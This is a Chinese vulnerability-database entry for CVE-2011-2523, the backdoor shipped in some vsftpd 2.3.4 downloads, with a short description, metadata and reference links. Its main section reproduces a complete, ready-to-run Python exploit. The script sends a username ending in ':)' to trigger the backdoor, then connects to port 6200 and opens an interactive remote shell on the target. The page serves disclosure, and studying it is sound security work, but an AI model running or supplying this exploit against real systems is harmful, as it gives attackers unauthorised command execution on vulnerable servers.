vsftpd 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1839291 漏洞类型 操作系统命令注入
发布时间 2021-04-12 更新时间 2021-04-12
CVE编号 CVE-2011-2523 CNNVD-ID CNNVD-201911-1459
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2021040068
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201911-1459
|漏洞详情
vsftpd是一款用于类Unix系统的FTP(文件传输协议)服务器。 vsftpd 2.3.4版本(2011年6月30日至2011年7月3日期间下载)中存在安全漏洞,该漏洞源于软件中存在可以打开shell的后门。攻击者可利用该漏洞执行命令。
|漏洞EXP
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523

#!/usr/bin/python3   
                                                           
from telnetlib import Telnet 
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
    # Handle any cleanup here
    print('   [+]Exiting...')
    exit(0)

signal(SIGINT, handler)                           
parser=argparse.ArgumentParser()        
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()       
host = args.host                        
portFTP = 21 #if necessary edit this line

user="USER nergal:)"
password="PASS pass"

tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
|参考资料

来源:MISC

链接:https://access.redhat.com/security/cve/cve-2011-2523


来源:MISC

链接:https://security-tracker.debian.org/tracker/CVE-2011-2523


来源:vigilance.fr

链接:https://vigilance.fr/vulnerability/vsftpd-backdoor-in-version-2-3-4-10805


来源:MISC

链接:https://packetstormsecurity.com/files/102745/VSFTPD-2.3.4-Backdoor-Command-Execution.html


来源:MLIST

链接:https://www.openwall.com/lists/oss-security/2011/07/11/5


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2011-2523